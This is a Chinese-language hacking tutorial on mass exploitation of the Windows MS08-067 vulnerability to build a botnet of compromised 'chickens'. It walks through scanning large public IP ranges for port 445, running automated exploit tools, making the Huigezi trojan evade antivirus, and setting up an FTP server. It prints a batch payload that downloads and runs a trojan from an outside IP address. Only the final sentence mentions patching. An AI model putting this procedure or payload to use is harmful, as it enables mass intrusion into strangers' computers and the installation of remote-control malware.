染雾MS08-67溢出可以说是今年爆出的最大漏洞之一,由于其覆盖范围广,并且用户的防范意识较差,再加上入侵比较简单,成为众多 首选的圈鸡工具!对于一般用户,我们今天推荐一些简单的批处理方法,来快速俘获网络肉鸡,
MS0867溢出:最强系统漏洞批量入侵网站安全
。一、MS08-67溢出全自动
如果不懂CMD命令提示符窗口,不熟悉各种命令操作,那是不行的。CMD命令提示符窗口下的各种批处理命令,有时可以帮我们方便的完成各种复杂的手
1.设置IP段
下载“MS08-67溢出全自动”工具,解压后打开其中的“TXT”和“TXT2”文件夹,在其中共有八个IP文件,分别名为“IP1.txt”、“IP2.txt”等。用记事本打开文件后,添加要扫描的地址段即可。每个文件中放一段IP即可,而且IP地址段范围不要太长,否则成功率不高,一般一段中包含5万个IP地址就够了。
2.设置上传服务器
用记事本打开“down2.txt”文件后,可以看到这是一段FTP自动上传的批处理命令代码。我们需要作的就是将其中的FTP服务器地址和登陆用户名及密码等修改,并保存修改后的文件。
很多木马控制端程序都带有FTP服务功能,例如在灰鸽子木马中,打开FTP服务器工具窗口。设置FTP服务器的主目录为本地主机硬盘上的任意路径,设置“服务端口”为21,再设置一个用户名和密码。设置完毕后,点击“开启服务”按钮即可。注意自建FTP服务器时,必须有一个公网IP地址,否则无法从Internet上连接FTP服务器下载运行木马。
开启FTP服务后,将“down2.txt”文件中的FTP服务器修改为自己的IP地址,并修改输入刚才设置的FTP服务器用户名及密码即可。
3.设置服务端程序
先对木马进行免杀等各种操作,并放在刚才设置为FTP服务器根目录的文件夹路径下。然后将“down2.txt”文件中的“你要下载的文件abc.exe”修改为木马文件名,并将另外的几个“abc.exe”也改为木马文件名,保存文件即可。最后修改好的“down2.txt”文件如下:
echoopen220.172.228.177>cc1.dat
echoxiaoyao>>cc1.dat
echoxiaoyao>>cc1.dat
echobinary>>cc1.dat
echogetmuma.exe>>cc1.dat
echobye>>cc1.dat
ftp-s:cc1.dat
muma.exe
delcc1.dat
muma.exe
exit
注意,最后一个“exit”字符串后面,一定要加上一个回车符,这样才能自动退出溢出上传状态,
电脑资料
《MS0867溢出:最强系统漏洞批量入侵网站安全》()。4.批量溢出现在可以开始进行批量溢出攻击了。在“MS08-67溢出全自动”工具目录下的有两个批处理文件“win2k.BAT”和“xp.bat”,分别运行在Windows2000/2003系统和WindowsXP系统中。根据自己所使用的系统类型,双击相应的批处理文件,即可开始自动溢出。
溢出工具首先会扫描指定IP地址段中开放了445端口的主机,并保存漏洞主机IP地址,然后自动进行溢出上传木马攻击。
二、MS08067批量溢出
运行批量溢出工具中的“445.exe”工具进行批量扫描。工具也是一个命令行下的批处理程序,先选择自己的系统类型,如果是WindowsXP主机,则按下数字“1”,使用TCP多线程扫描方式;如果是Windows2000/2003主机,则按下数字“2”,使用SYN扫描。
按下数字键后,自动打开“IP.txt”文件。该文件是用于设置要扫描的IP地址段,例如这里选择扫描“220.172.25.1-220.200.30.254”IP地址段,可以支持多行输入扫描。设置IP地址段后,保存文件关闭记事本窗口。
返回溢出窗口中,按下任意键,即可开始自动进行漏洞主机扫描了。程序是调用S扫描器进行批量扫描的,扫描速度很快,扫描的结果会被保存在当前目录下的“Result.txt”文件中。最后,程序会自动整理扫描结果,将所有开放了445端口的主机IP地址,将单独保存为一个名为“host.txt”的文件。
扫描完毕后,运行“yichu.exe”即可自动进行批量溢出。
针对MS08067溢出漏洞,笔者认为最好的方法就是安装补丁,虽然说针对445端口封锁也可以起到同样效果,但对于很多应用环境来说还是比较麻烦。另外如果有必要,还可以用防火墙监听一下相应端口。
